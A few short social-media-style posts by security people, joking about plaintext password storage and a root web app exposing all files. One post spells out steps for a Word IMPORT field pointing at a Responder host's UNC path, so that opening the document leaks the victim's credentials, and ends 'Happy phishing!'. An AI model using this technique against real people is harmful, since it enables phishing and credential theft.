Funny, I thought storing plain text passwords was a violation of #GDPR
Ofcourse they did.
Submitted this to MSRC, won't patch, it's a "feature"; Open Word -> CTRL + F9 -> IMPORT "\\\\Responder-IP\\1.jpg" -> right click and select "Edit Field" -> tick "Data not stored in document" -> save & close. Open the document -> free credentials :) Happy phishing!
Couldn’t get in through SSH or a reverse shell, but when you have a web app installed that runs as root and lets you view/edit all files on the machine, might as well have.